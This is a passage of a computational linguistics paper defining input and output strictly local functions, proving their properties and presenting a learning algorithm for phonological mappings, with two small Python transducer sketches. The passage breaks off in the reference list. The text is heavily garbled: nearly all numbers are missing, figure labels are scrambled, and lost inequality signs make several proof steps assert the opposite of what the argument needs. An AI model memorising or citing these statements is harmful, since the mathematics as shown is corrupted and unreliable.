to construct t cf first let, for all x ∈ Σ∗ and a ∈ Σ, the contribution of a w.r.t. x be contf (a,x) = lcp(f(xΣ∗)− lcp(f(xaΣ∗)). then, • q = {tailsf (x) | x ∈ Σ∗}, • q = tailsf (λ), • ∀tailsf (x) ∈ q, σ(tailsf (x)) = lcp(f(xΣ∗))− f(x) if x ∈ dom(f) and is un- defined otherwise, • δ = { (tailsf (x),a,contf (a,x), tailsf (xa))}. t cf has an important property called onwardness. definition (onwardness). for all q ∈ q let the outputs of the edges out of q be outs(q) = { u | (∃a ∈ Σ)(∃r ∈ q)[(q,a,u,r) ∈ δ] } . a sfst t is onward if for all q ∈ q\{q }, lcp(outs(q)) = λ. informally, this means that the writing of output is never delayed. readers are referred to oncina and garcı́a ( ), oncina et al. ( ), and mohri ( ) for more on sfsts. strictly local functions in this section we define input and output strictly local functions and provide properties of these classes. these definitions are analogous to the language-theoretic definition of strictly local lan- guages (theorem ) (rogers and pullum, ; rogers et al., ). definition (input strictly local function). a func- tion f is input strictly local (isl) if there is a k such that for all u ,u ∈ Σ∗, if suffk− (u ) = suffk− (u ) then tailsf (u ) = tailsf (u ). the theorem below establishes an automata- theoretic characterization of isl functions. theorem . a function f is isl iff there is some k such that f can be described with a sfst for which . q = Σ≤k− and q = λ . (∀q ∈ q,∀a ∈ Σ,∀u ∈ Γ∗)[ (q,a,u,q′) ∈ δ ⇒ q′ = suffk− (qa) ] . this theorem helps make clear how isl functions are markovian: the output for input symbol a de- pends on the last (k− ) input symbols. also, since the transducer defined in theorem is determinis- tic, it is unique and we refer to it as t islf . t islf may not be isomorphic to t cf . figure shows t islf (with k = ) and t cf for the identity function. a b! a ba b #:! #:!#:! a b t !isl for identity function ! #:! a,b t c for identity function figure : non-isomorphic t islf (left) and t cf (right) before we present the proof of theorem , we make the following remarks, and then prove a lemma. remark . for all n,m ∈ n with n ≤ m, and for all w ∈ Σ∗, suffn(suffm(w)) = suffn(w) since both w and suffm(w) share the same n-long suffix. remark . for all w,v ∈ Σ∗,k ∈ n, suffk− ( suffk− (w)v ) = suffk− (wv). this is a direct consequence of remark . lemma . let t be a sfst constructed as in the- orem . if (λ,w,u,q) in δ∗ then q = suffk− (w). proof. the proof is by induction on δ∗. the base case follows from the facts that (λ,λ,λ,λ) ∈ δ∗ (by definition of δ∗), and that λ = suffk− (λ). next assume the inductive hypothesis (ih) that there exists w ∈ Σ∗, u ∈ Γ∗, such that (λ,w,u,q) ∈ δ∗ implies q = suffk− (w). we show ∀a ∈ Σ, ∀x ∈ Γ∗ that (λ,wa,ux,q′) ∈ δ∗ implies q′ = suffk− (wa). now (λ,w,u,suffk− (w)) ∈ δ∗ (by ih) so (suffk− (w),a,x,q′) ∈ δ. by construc- tion of t , q′ = suffk− (suffk− (w)a), which by remark , equals suffk− (wa). proof of theorem . (⇐) fix k ∈ n and let f be a function described by t = {q,q , Σ, Γ,δ,σ} con- structed as in theorem . let w ,w ∈ Σ∗ such that suffk− (w ) = suffk− (w ). by lemma , in all figures, single-symbol transition labels indicate that the input and output are identical, and the final output function is represented as a transition on the end-of-word symbol #. both w and w lead to the same state and therefore tailsf (w ) = tailsf (w ). thus f is k-isl. (⇒) consider any isl function f. then there is a k such that (∀w ,w ∈ Σ∗)[suffk− (w ) = suffk− (w ) ⇒ tailsf (w ) = tailsf (w )]. we show that t islf exists. 
since Σ≤k− is a finite set, the equivalence relation ∼f partitions Σ∗ into at most |Σ≤k− | blocks. hence by theorem , f is subsequential and a canonical subsequential trans- ducer t cf = {qc,q c, Σ, Γ,δc,σc} exists. construct t = {q,q , Σ, Γ,δ,σ} as follows: • q = Σ≤k− and q = λ • ∀q ∈ q,σ(q) = σc ( tailsf (q) ) if f(q) is de- fined, else σ(q) is undefined. • ∀q ∈ q, ∀a ∈ Σ, ∀u ∈ Γ∗,( q,a,u,suffk− (qa) ) ∈ δ iff( tailsf (q),a,u,tailsf (qa) ) ∈ δc. first, by its construction, the states and transitions of t meet requirements ( ) and ( ) of theorem . next, we show that t computes the same function as t cf . we first establish by induc- tion on δ∗ the following (?): ∀w ∈ Σ∗, ∀u ∈ Γ∗, ( q ,w,u,suff k− (w) ) ∈ δ∗ iff( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . clearly ( tailsf (λ),λ,λ,tailsf (λ) ) ∈ δ∗c and( λ,λ,λ,λ ) ∈ δ∗ by definition of the extended tran- sition function. thus the base case is satisfied. next assume the inductive hypothesis (ih) for w ∈ Σ∗ and u ∈ Γ∗. we show ∀a ∈ Σ and ∀x ∈ Γ∗ that ( λ,wa,ux,suffk− (wa) ) ∈ δ∗ iff( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . suppose ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . by ih, ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c ; hence ( tailsf (w),a,x,tailsf (wa) ) ∈ δc. let q = suffk− (w). observe that suffk− (w) = suffk− (q) by remark . conse- quently, since f is k-isl, tailsf (w) = tailsf (q). similarly, suffk− (wa) = suffk− (qa) and thus tailsf (wa) = tailsf (qa). by substitution then, we have ( tailsf (λ),w,u,tailsf (q) ) ∈ δ∗c and( tailsf (q),a,x,tailsf (qa) ) ∈ δc. by construction of t , ( q,a,x,suffk− (qa) ) ∈ δ. by ih, ( λ,w,u,suffk− (w) ) = ( λ,w,u,q ) ∈ δ∗. thus, ( λ,wa,ux,suffk− (qa) ) ∈ δ∗ which is the same as saying ( λ,wa,ux,suffk− (wa) ) ∈ δ∗. conversely, consider any a ∈ Σ and x ∈ Γ∗ and suppose ( λ,wa,ux,suffk− (wa) ) ∈ δ∗. by ih, ( λ,w,u,suffk− (w) ) ∈ δ∗; hence( suffk− (w),a,x,suffk− (wa) ) ∈ δ. as be- fore, letting q = suffk− (w), it follows that suffk− (w) = suffk− (q) so tailsf (w) = tailsf (q), and suffk− (wa) = suffk− (qa) so tailsf (wa) = tailsf (qa). therefore,( q,a,x,suffk− (qa) ) ∈ δ. by construction of t , this means( tailsf (w),a,x,tailsf (wa) ) ∈ δc. by ih,( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . by the defi- nition of the extended transition function, it follows that ( tailsf (λ),wa,ux,tailsf (wa) ) ∈ δ∗c . this completes the induction, establishing (?). let w ∈ Σ∗. if f(w) is defined then f(w) = uv where ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c and σc ( tailsf (w) ) = v. from (?), we know ( λ,w,u,suffk− (w) ) ∈ δ∗. also, σ ( suffk− (w) ) = σc ( tailsf (suff k− (w)) ) . since f is k-isl, tailsf (w) = tailsf (suff k− (w)) (cf. remark ). thus σ ( suffk− (w) ) = σc ( tailsf (w) ) = v. there- fore t (w) = uv also. if f(w) is not defined then there are two cases. case : ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c . by the above lemma, it follows( λ,w,u,suffk− (w) ) ∈ δ∗ and so t (w) is also de- fined. case : ( tailsf (λ),w,u,tailsf (w) ) ∈ δ∗c but σc(tailsf (w)) is undefined. by construction of t , σ(suffk− (w)) is also undefined. similar to definition above, the following defi- nition of osl functions says that if the outputs of two input strings share the same suffix of length (k − ), then those inputs have the same tails. definition (output strictly local function). a function f is output strictly local (osl) if there is a k such that for all u ,u ∈ Σ∗, if suffk− (f(u )) = suffk− (f(u )) then tailsf (u ) = tailsf (u ). the automata-theoretic characterization of this class is left as future work. 
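the automata-theoretic characterization of isl functions given above is mechanical enough to sketch directly: states are the strings in Σ of length at most k-1, the start state is λ, and reading a in state q leads to suff_{k-1}(qa). the helper below builds a machine of exactly that shape once per-transition outputs and final outputs are supplied; the function names are ours, and the example merely rebuilds the identity-function transducer with k = 2 discussed earlier.

```python
from itertools import product

def isl_transducer(sigma_in, k, emit, final_out):
    """Build the ISL-shaped machine: states are all strings over sigma_in of
    length <= k-1, the start state is '' (lambda), and reading a in state q
    moves to suff_{k-1}(qa) while writing emit(q, a)."""
    suff = lambda w, n: w if len(w) <= n else w[len(w) - n:]
    states = [''.join(p) for n in range(k) for p in product(sigma_in, repeat=n)]
    delta = {(q, a): (emit(q, a), suff(q + a, k - 1))
             for q in states for a in sigma_in}
    sigma = {q: final_out(q) for q in states}
    return delta, sigma

def run(delta, sigma, w):
    q, out = '', ''
    for a in w:
        piece, q = delta[(q, a)]
        out += piece
    return out + sigma[q]

# Example: the 2-ISL identity function (emit the symbol read, append nothing).
delta, sigma = isl_transducer('ab', 2, emit=lambda q, a: a,
                              final_out=lambda q: '')
assert run(delta, sigma, 'abba') == 'abba'
```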
next, some properties of isl and osl functions are identified. the proofs of the following theorems will refer to the example sfsts in figure . first we establish that isl and osl functions are proper subclasses of the subsequential functions. (they are subclasses by definition.) theorem . there are subsequential functions which are neither isl nor osl. a #:! #:! b,c a,b:a,c f a b! b aa b #:! #:!#:! a:b b f a b! a a b,c:b #:! #:!#:! a,b:a,c:a b,c:b f a b! b a:aa a:aa b #:! #:! #:! a:aa b f a #:! #:a a f a a:! #:!#:! f figure : examples for proofs of theorems - proof. consider the subsequential function f in figure and choose any k ∈ n. since f (bc kb) = bckb and f (ackb) = acka it follows that tailsf (bc k) = tailsf (ack) even though in- puts bck and ack share a common suffix of length (k − ). likewise, the outputs of these inputs f (bc k) = bck and f (ack) = ack share a common suffix of length (k − ), but the tails of these inputs, as mentioned, are distinct. hence by definitions and , there is no k for which f is isl or osl. theorem . the class of isl functions is incompa- rable to the class of osl functions. proof. consider f in figure . this function is isl by theorem . however it is not osl. consider any k ∈ n. observe that f (aak) = f (abk) = abk and so the outputs share the same suffix of length (k − ). however, tailsf (aa k) = tailsf (abk) since (a,b) ∈ tailsf (aak) but (a,a) ∈ tailsf (abk). similarly, consider f in figure . this function is -osl because inputs mapped to outputs which end in a have the same tails (i.e., they all lead to state a), and inputs mapped to outputs ending in b have the same tails. however, f is not isl. consider any k ∈ n. the inputs cbk and abk share the same suf- fix of length (k − ). however, tailsf (cbk) = tailsf (ab k) since (b,b) ∈ tailsf (cbk) but (b,a) ∈ tailsf (abk). finally, the two classes are obviously not disjoint, since the identity function is both isl and osl. theorem . the output language of an isl or osl function is not necessarily a strictly local language. proof. consider f in figure . by theorem , it is isl. it is also -osl since inputs mapped to out- puts which end in a have the same tails (i.e., they all lead to state a). similarly, inputs mapped to outputs ending in b have the same tails. let k ∈ n. observe that f (ak) = a k and fur- ther that there is no input x and k such that f (x) = a k+ . since a k = ak− aka = ak− akaa, if the output language of f were sl it would follow, by theorem , that ak− akaa = a k+ also belongs to the output language. but there is no input in Σ∗ which f maps to an odd sequence of a’s. theorem . if either the output or input language of a subsequential function f is strictly local then it does not follow that f belongs to either isl or osl. proof. let Σ = Γ = {a} and consider the function f which, for all n ∈ n, maps an to an if n is even and an to ana if n is odd. f is subsequential, as shown in figure , and its domain, a∗, is a strictly local language. however, f is neither isl nor osl for any k since the tails of a k includes (λ,λ) but the tails of aa k includes (λ,a). next consider f , which for all n ∈ n maps an to am where m = (n div ) if n is even and m = (n div )+ if n is odd. f is subsequential, as shown in figure , and the image(f) = a∗ is strictly local. however, f is neither isl nor osl for any k since the tails of a k includes (a,a) but the tails of aa k includes (a,λ). 
relevance to phonology this section will briefly discuss the range of phono- logical processes that can be modeled with isl and/or osl functions by providing illustrative ex- amples for three common, representative processes. these are shown in ( ) with spe-style rules. ( ) a. devoicing: d → t / # b. epenthesis: ∅ → @ / {l, r} [-coronal] c. deletion: {t, d}→ ∅ / {t, s} see chandlee ( ) for more details. first, consider the process of final obstruent de- voicing ( -a), attested in german and other lan- guages. this process causes an underlying voiced obstruent in word-final position to surface as its voiceless counterpart. in ( -a), d abbreviates the set of voiced obstruents and t the voiceless obstruents. the mapping from underlying form to surface form that this process describes is represented with the -isl function in figure (note n represents any sonorant). ! d n t d:! n d:! n t t t:dt n:dnd:! #:! #:t #:! #:! t d n figure : t islf for ( -a) with k = and Σ = {t, d, n} in addition to substitution processes like ( -a), an- other common type of process is insertion of a seg- ment, such as the @-epenthesis process attested in dutch (warner et al., ). this process inserts a schwa between a liquid and a non-coronal con- sonant, as specified by ( -b). using l to represent the liquids {l, r} and k to represent any non-coronal consonant, figure presents t islf for this process. following beesley and karttunen ( ), the sym- bol ‘?’ represents any segment of the alphabet other than the ones for which transitions are defined. lastly, an example deletion process from greek (joseph and philippaki-warburton, ) deletes in- terdental fricatives before /t/ or /s/, as in ( -c). fig- ure presents t islf for this process. these abbreviations serve to improve the readability of the fst - it is assumed that the transduction replaces a given voiced obstruent with its voiceless counterpart (not with any voiceless obstruent). this means figure is actually a shorthand for t islf , which would otherwise have a distinct state for each symbol now rep- resented with ‘?’. ! k ? l k:@k ? k ? l l l ?k #:! #:! #:! #:! l k ? figure : t islf for ( -b) with k = and Σ = {l, k, ?} ! d s ? t d:! s ? t:! s ?:t? s d:! ?:d? d:! t:! t:! d:t t:! ? s#:d #:! #:! #:! #:t t:! s ? d figure : t islf for ( -c) with k = and Σ = {t, d, s, ?} the german, dutch, and greek examples demon- strate how isl functions can be used to model the input-output mapping of a phonological rule. be- yond substitution, insertion, and deletion, it is shown in chandlee ( ) that isl and/or osl functions can also model many metathesis patterns, specifi- cally those for which there is an upper bound on the amount of material that intervenes between a segment’s original and surface positions (this ap- pears to include all synchronic patterns). in addi- tion, morpho-phonological processes such as local partial reduplication (i.e., in which the reduplicant is affixed adjacent to the portion of the base it was copied from) and general affixation are also shown to be isl or osl. more generally, we currently con- jecture that a spe-style rewrite rule of the form a → b/ c d which applies simultaneously (left- to-right) describes an input (output) strictly local function iff there is a k such that for all w ∈ cad it is the case that |w| ≤ k. we refer readers to ka- plan and kay ( ) and hulden ( ) for more on how spe rules and application modes determine mappings. 
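as a concrete rendering of the devoicing mapping just described, the sketch below encodes a 2-isl transducer over the abbreviated alphabet {t, d, n}: each transition's target state is the last symbol read, a voiced obstruent d is held back until the next symbol shows the word has not ended, and the final-output function releases it as t otherwise. this is our own dictionary encoding of the rule, not the paper's figure reproduced verbatim.

```python
# States are the last input symbol read ('' at the start); a voiced
# obstruent d is buffered until we know whether the word continues.
SIGMA = 'tdn'   # t = voiceless obstruents, d = voiced obstruents, n = sonorants

def emit(q, a):
    buffered = 'd' if q == 'd' else ''   # release a buffered d: it was not final
    return buffered + ('' if a == 'd' else a)

delta = {(q, a): (emit(q, a), a) for q in [''] + list(SIGMA) for a in SIGMA}
sigma = {q: ('t' if q == 'd' else '') for q in [''] + list(SIGMA)}

def devoice(w):
    q, out = '', ''
    for a in w:
        piece, q = delta[(q, a)]
        out += piece
    return out + sigma[q]

# Matches the devoicing sample used later for the learner.
assert devoice('d') == 't' and devoice('dd') == 'dt'
assert devoice('dnt') == 'dnt' and devoice('nnd') == 'nnt'
assert devoice('tdn') == 'tdn'
```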
in contrast, non-local (long-distance) processes such as vowel harmony with transparent vowels (gainor et al., ; heinz and lai, ), long dis- tance consonant harmony (hansson, ; rose and walker, ; luo, ) and dissimilation (suzuki, ; bennett, ; payne, ), unbounded dis- placement/metathesis (chandlee et al., ; chan- dlee and heinz, ), non-local partial reduplica- tion (riggle, ), and some tonal patterns (jar- dine, ) cannot be modeled with isl or osl functions. in § we comment on the potential for adapting the current analysis to non-local mappings. the next section presents a learning algorithm for isl functions, the islfla. the development of a corresponding algorithm for osl functions is the subject of ongoing work, but see § for comments. learning input strictly local functions we now present a learning algorithm for the class of isl functions that uses its defining property as an in- ductive principle to generalize from a finite amount of data to a possibly infinite function. this learner begins with a prefix tree representation of this data and then generalizes by merging states. its state merging criterion is based on the defining property of isl functions: two input strings with the same suffix of length (k− ) have the same tails. the next section explains in detail how the algorithm works. . the algorithm: islfla given a finite dataset d of input-output string pairs (w,w′) such that f(w) = w′, where f is the target function, the learner tries to build t islf . the dataset is submitted to the learner in the form of a prefix tree transducer (ptt), which is defined in definition . definition (prefix tree transducer). a prefix tree transducer for finite set d = {(w,w′) | f(w) = w′} for some f is ptt(d) = (q,q , Σ, Γ,δ,σ), where • q = ⋃ {pref(w)|(w,w′) ∈ d} and q = λ • δ = {(u,a,λ,ua) | u,ua ∈ q} • σ(w) = w′ for all (w,w′) ∈ d this general strategy is common in grammatical inference. see angluin ( ), heinz ( ), and de la higuera ( ). as an example, the sample of data in ( ) exempli- fies the final devoicing rule in ( -a). figure gives the ptt for this data. ( ) {(d, t), (dd, dt), (dnt, dnt), (nnd, nnt), (tdn, tdn)} ! d n t td tdn nn nnd dd dn dnt t:! #:dnt d:! n:! #:dt #:t n:! d:! #:nnt #:tdnn:!d:! d:! n:! t:! #:! figure : ptt for the data in ( ) given such a ptt, the learner’s first step is to make it onward. in the ptt, the output string is with- held until the end of the input (i.e., #) is reached. in the onward version (shown in figure ), output is advanced as close to the root as possible. this in- volves determining the lcp of all the output strings of all outgoing transitions of a state (starting from the leaves) and suffixing that lcp to the output of the single incoming transition of the state. ! d n t td tdn nn nnd dd dn dnt t:! #:! d:dt n:dnt #:! #:t n:! d:! #:! #:!n:! d:! d:! n:nnt t:tdn #:! figure : onward version of the ptt in figure once the learner has constructed this onward rep- resentation of the data, it begins to merge states, using two nested loops. the outer loop proceeds through the entire state set (ordered lexicographi- cally) and merges each state with the state that cor- responds to its (k − )-length suffix. for example, for final devoicing k = , so each state will be merged with the state that represents its final sym- bol. this merging may introduce non-determinism, which must be removed since by definition t islf is deterministic. non-determinism is removed in the inner loop with additional state merges. 
consider the situation depicted on the lefthand side of figure , which resulted from a previous merge. the non-determinism could be resolved by d:! n:n d:! t:dt t:dtn d:n n:nn d:! t:dt t:dt figure : before (left) and after (right) pushback merging states and , except for the fact that the output strings of the two transitions differ. before merging and , therefore, the learner performs an operation called pushback that retains the lcp of the two output strings and prefixes what’s left to all output strings of all outgoing transitions from the re- spective destination states. definition (pushback (oncina et al., )). for sfst t = (q,q , Σ, Γ,δ,σ), v ∈ Σ∗, and e = (q,a,w,q′) ∈ δ, pushback ( t ,v,e ) = (q,q , Σ, Γ,δ ′,σ) where δ′ = (δ ∪ {q,a,wv− ,q′)} ∪ {(q′,b,vz,q′′)|(q′,b,z,q′′) ∈ δ}) \ ({(q′,b,z,q′′)}∪{e}). in the example in figure , pushback is applied to the edges ( ,t,dt, ) and ( ,t,dtn, ). only the lcp of the output strings, which is dt, is retained as the output string of both edges. the remainder (which is λ and n, respectively) is prefixed to the output string of all transitions leaving the respective destination state. the result is shown on the right- hand side of figure . essentially, pushback ‘un- does’ onwardness when needed. after pushback, states and can be merged. this removes the initial non-determinism but creates new non-determinism. the inner loop iterates un- til all non-determinism is resolved, after which the outer loop continues with the next state in the order. if the inner loop encounters non-determinism that cannot be removed, the islfla exits with a mes- sage indicating that the data sample is insufficient. non-removable non-determinism occurs if and only if the situation depicted on the left in figure obtains. the normal procedure for removing non- q #:! #:z q s t a:u a:v figure : irreparable non-determinism (left) and non- determinism from an outer loop merge (right). determinism cannot be applied in this case. assum- ing z = λ, all of z would have to be pushed back, but since this transition has no destination state there is nowhere for z to go. ostia handles this situ- ation by rejecting the outer loop merge that led to it, restoring the fst to its state before that merge and moving on to the next possible merge. but the islfla cannot reject merges. if it could, the pos- sibility would arise that two states with the same (k − )-length suffix would remain distinct in the final fst the learner outputs. such a fst would not (by definition) be isl. therefore, the algorithm is at an impasse: rejecting a merge can lead to a non-isl fst, while allowing it can lead to a non- subsequential (hence non-isl) fst. it therefore ter- minates. below is pseudo-code for the islfla. data: ptt(d) result: t islf τ = onward(ptt) q = next(qτ,first(qτ )) while q < last(qτ ) do merge(q, suffk− (q)) while ∃(q,a,x,q ), (q,a,y,q ) ∈ δτ do if a = # and x = y then exit ‘insufficient data’ else pushback(τ, (q,a,x,q ),lcp(x,y)) pushback(τ, (q,a,y,q ),lcp(x,y)) merge(q ,q ) q = next(qτ,q) return τ algorithm : pseudo-code for the islfla . learning results here, we present a proof that the islfla identifies the class of isl functions in the limit from positive data, in the sense of gold ( ), with polynomial bounds on time and data (de la higuera, ). first, we establish the notion of characteristic sample. definition (characteristic sample). a sample cs is characteristic of a function f for an algorithm a if for all samples s s.t. 
cs ⊆ s, a returns a represen- tation τ such that for all x ∈ dom(f), τ(x) = f(x), and for all x /∈ dom(f), τ(x) is not defined. we can now define the learning criteria. definition (identification in polynomial time and data (de la higuera, )). a class f of functions is identifiable in polynomial time and data using a class t of representations iff there exist an algorithm a and two polynomials p() and q() such that: . given a sample s of size m for f ∈ f, a re- turns a hypothesis in o(p(m)) time; . for each representation τ of size k of a function f ∈ f, there exists a characteristic sample cs of f for a of size at most o(q(k)). essentially the proof for convergence follows from the fact that given a sufficient sample the al- gorithm merges all and only states with the same (k − )-length suffix. clearly, merges in the outer loop only involve states with the same (k − )-length suffix. this is also the case for inner loop merges. consider the scenario depicted on the right in figure , in which q is a state created by an outer loop merge. after pushback, states s and t will be merged. if x = suffk− (q), then both s and t must have xa as a suffix. since |xa| = k, it follows that suffk− (s) = suffk− (t). it also follows that additional states merged to remove non-determinism resulting from the merge of s and t will have the same suffix of length (k− ). to show that all states with the same (k − )-length suffix will be merged, it is shown that the islfla will never encounter the situation in figure , provided the data set includes a seed de- fined as follows. definition (islfla seed). given a k-isl function f and t islf , let q′ = {q ∈ q | δ (q, #) = λ}. a seed for f is s = s′ ∪s′′, where • s′ = {(w,w′) | [w ∈ Σ≤k ∧f(w) = w′]} • s′′ = {(wa,w′′) | a ∈ Σ, [w ∈ Σk ∧ suffk− (w) ∈ q′ ∧f(wa) = w′′]}. lemma (convergence). a seed for an isl func- tion f is a characteristic sample for islfla. proof. we show that for any isl function f and a dataset d that contains a seed s the output of the islfla is t islf . let ptt(d) = (qptt ,q p t t , Σ, Γ,δptt , σptt ) be the input to the islfla and t = (qt ,q t , Σ, Γ,δt ,σt ) be its output. first we show that qt = Σ≤k− . by definitions and , Σ≤k− ⊆ qptt . since the islfla only merges states with the same (k− )-length suffix, Σ≤k− ⊆ qt . since it does not exit until all states q have been merged with suffk− (q), qt = Σ≤k− . next we show that given s, the algorithm will never need to merge two states q and q such that δ (q , #) = δ (q , #). let δ (q , #) = z, and δ (q , #) = x with z = x and q = suffk− (q ). by definition , tailsf (q ) = tailsf (q ), so if z = x it must be the case that q does not have tran- sitions for all a ∈ Σ. this is because the only way for the output strings of the outgoing transitions of q to differ from those of q is if fewer transitions were present on q when the ptt was made onward. (by definition of s we know q has transitions for all a ∈ Σ.) but since tailsf (q ) = tailsf (q ), we also know that z = ux for some u ∈ Γ∗. by definition , all states up to length k have tran- sitions for all a ∈ Σ; therefore, |q | ≥ k + . this means ∃q′ ∈ Σk between q and q , which will be merged with some other state before q will. this merge will cause non-determinism, which in turn will trigger pushback and cause u to move further down the branch toward q . by extension there will be |q |−k states between q and q , each of which will be merged, triggering pushback of u, so that by the time q and q are merged, δ (q , #) = ux = z = δ (q , #). 
thus, all non-determinism can be removed, and so t is subsequential. it remains to show that ∀q ∈ qt ,a ∈ Σ, δ (q,a) = suff k− (qa). since state merging pre- serves transitions, this follows from the construction of ptt(d). by theorem , t = t islf . next we establish complexity bounds on the run- time of the islfla and the size of the characteristic sample for isl functions. we observe that both of these bounds improve the bounds of ostia. while not surprising, since isl functions are less general than subsequential functions, the result is important since it is an example of greater a priori knowledge enabling learning with less time and data. let m be the length of the longest output string in the sample and let n denote the number of states of the ptt; n is at most the sum of the lengths of the input strings of the pairs in the sample. lemma (polynomial time). the time complexity of the islfla is in o(n ·m ·k · |Σ|). proof. first, making the ptt onward can be done in o(m · n): it consists of a depth-first parsing of the ptt from its root, with a computation at each state of the lcp of the outgoing transition outputs after the recursive computation of the function (see de la higuera ( ), chap. , for details). as the com- putation of the lcp takes at most m steps, and as it has to be done for each state, the complexity of this step is effectively in o(m ·n). for the two loops, we need to find a bound on the number of merges that can occur. states q such that |q| < k do not yield any merges in the outer loop. all other states q′ are merged with suffk− (q), in the outer loop or in the inner one. the number of merges is thus bounded by n. computing the suffix of length (k − ) of any word can be done in o(k) with a correct implementation of strings of charac- ters. the test of the inner loop can be done in con- stant time and so can the merge and pushback pro- cedures. after each merge, the test of the inner loop needs to be done at most |Σ| times. as computing the lcp has a complexity in o(m), the overall com- plexity of the two loops is in o(n ·m ·k · |Σ|). the overall complexity of the algorithm is thus o(m ·n + n ·m ·k · |Σ|) = o(n ·m ·k · |Σ|). let t islf = (q,q , Σ, Γ,δ,σ) be a target trans- ducer. we define m = max{|u| | (q,a,u,q′) ∈ δ}, n = |q|, and p = max {|v| | (q, #,v) ∈ σ}. lemma (polynomial data). the size of the charac- teristic sample is in o(n·|Σ|·k·m+n ·m+n·|Σ|·p). proof. the first item of the seed, s′, covers all and only the states of the target: the left projection of these pairs is thus linear in n and every right projec- tion is at most n · m + p. thus the size of s′ is at most n · (n + n ·m + p) = o(n ·m + n ·p). concerning the second part, s′′, its cardinality is at most n · |Σ| (in the rare case where q′ = q). each element of the left projection of s′′ is of length (k + ) and each element of its right projection is at most of length (k + )·m+p. the size of s′′ is thus in o(n · |Σ| · (k ·m + p)). therefore, the size of the characteristic sample is in o(n·|Σ|·k·m+n ·m+n·|Σ|·p), which is clearly polynomial in the size of the target transducer. theorem . the islfla identifies the class of isl functions in polynomial time and data. proof. immediate from lemmas , , and . . demonstrations we tested the islfla with the three examples in § , as well as the english flapping process (t → r / v́ v). for each case, a data set was constructed according to definition using the alphabets pre- sented in § . the alphabet for english flapping was {v́, v, t, ?}. 
the value of k is for final devoicing, @-epenthesis, and fricative deletion and for english flapping. a few additional data points of length or were also added to make the data set a superset of the seed. in all four cases, the learner returned the correct t islf . the decision to use artificial corpora in these demonstrations was motivated by the fact that the sample in definition will not be present in a natural language corpus. that sample includes all possible sequences of symbols from the alphabet of a given length, whereas a natural language corpus will re- flect the language-particular restrictions against cer- tain segment sequences (i.e., phonotactics). as discussed in the introduction, gildea and ju- rafsky ( ) address this issue with natural lan- guage data by equipping ostia with a community bias, whereby segments belonging to a natural class (i.e., stops, fricatives, sonorants) are expected to be- have similarly, and a faithfulness bias, whereby seg- ments are assumed to be realized similarly on the surface. in our demonstrations we put aside the is- sue of the behavior of segments in a natural class by using abbreviated alphabets (e.g., t for all voiceless stops). but if in fact knowledge of natural classes precedes the learning of phonological processes, the use of such an alphabet is appropriate. in future developments of the islfla we like- wise aim to accommodate natural language data, but in a way that maintains the theoretical result of identification in the limit. the restrictions on seg- ment sequences represented in natural language data amount to ‘missing’ transitions in the initial prefix tree transducer that is built from that data. in other words, the transducer represents a partial, not a to- tal function. thus it seems the approach of oncina and varò ( ) and castellanos et al. ( ) could be very instructive, as their use of domain informa- tion enabled ostia to learn partial functions. in our case, the fact that the domain of an isl function is an sl language could provide a means of ‘filling in’ the missing transitions. the details of such an approach are, however, being left for future work. conclusion this paper has defined input and output strictly local functions, which synthesize the properties of subsequential transduction and strictly local formal languages. it has provided language-theoretic char- acterizations of these functions and argued that they can model many phonological and morphological processes. lastly, an automata-theoretic character- ization of isl functions was presented, along with a learning algorithm that efficiently learn this class in the limit from positive data. current work includes developing a comparable automata characterization and learning algorithm for osl functions, as well as defining additional func- tional classes to model those phonological processes that cannot be modeled with isl or osl functions. the sl languages are just one region of a subregu- lar hierarchy of formal languages (mcnaughton and papert, ; rogers and pullum, ; rogers et al., ). the isl and osl functions defined here are the first step in developing a corresponding hi- erarchy of subregular functions. of immediate in- terest to phonology are functional counterparts for the tier-based strictly local and strictly piecewise language classes, which have been shown to model long-distance phonotactics (heinz, ; heinz et al., ). such functions might be useful for mod- eling the long-distance processes that repair viola- tions of these phonotactic constraints. 
acknowledgements we thank adam jardine, jim rogers, and the three anonymous reviewers for helpful comments. this research was supported by nsf cps# . references dana angluin. . inference of reversible languages. journal for the association of computing machinery, ( ): – . kenneth r. beesley and lauri karttunen. . finite state morphology. center for the study of language and information. william bennett. . dissimilation, consonant har- mony, and surface correspondence. ph.d. thesis, rut- gers university. antonio castellanos, enrique vidal, miguel a. varó, and josé oncina. . language understanding and sub- sequential transducer learning. computer speech and language, : – . jane chandlee and jeffrey heinz. . bounded copy- ing is subsequential: implications for metathesis and reduplication. in proceedings of sigmorphon . jane chandlee and adam jardine. . learn- ing phonological mappings by learning strictly local functions. in john kingston, claire moore-cantwell, joe pater, and robert staubs, editors, proceedings of the meeting on phonology. lsa. jane chandlee and cesar koirala. . learning local phonological rules. in proceedings of the th penn linguistics conference. jane chandlee, angeliki athanasopoulou, and jeffrey heinz. . evidence for classifying metathesis patterns as subsequential. in the proceedings of the th west coast conference on formal linguistics, somerville, ma. cascadilla. jane chandlee. . strictly local phonological pro- cesses. ph.d. thesis, university of delaware. noam chomsky and morris halle. . the sound pattern of english. harper & row, new york. colin de la higuera. . characteristic sets for poly- nomial grammatical inference. machine learning, ( ): – . colin de la higuera. . grammatical inference: learning automata and grammars. cambridge uni- versity press. brian gainor, regine lai, and jeffrey heinz. . computational characterizations of vowel harmony patterns and pathologies. in the proceedings of the th west coast conference on formal linguistics, pages – , somerville, ma. cascadilla. daniel gildea and daniel jurafsky. . learning bias and phonological-rule induction. computational lin- guistics, ( ): – . e. mark gold. . language identification in the limit. information and control, : – . gunnar hansson. . theoretical and typological is- sues in consonant harmony. ph.d. thesis, university of california, berkeley. jeffrey heinz and regine lai. . vowel harmony and subsequentiality. in andras kornai and marco kuhlmann, editors, proceedings of the th meeting on the mathematics of language (mol ), pages – . jeffrey heinz, chetan rawal, and herbert g. tanner. . tier-based strictly local constraints for phonol- ogy. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational linguistics. jeffrey heinz. . the inductive learning of phono- tactic patterns. ph.d. thesis, university of california, los angeles. jeffrey heinz. . on the role of locality in learning stress patterns. phonology, : – . jeffrey heinz. . learning long-distance phonotac- tics. linguistic inquiry, : – . mans hulden, iñaki alegria, izaskun etxeberria, and montse maritxalar. . learning word-level dialec- tal variation as phonological 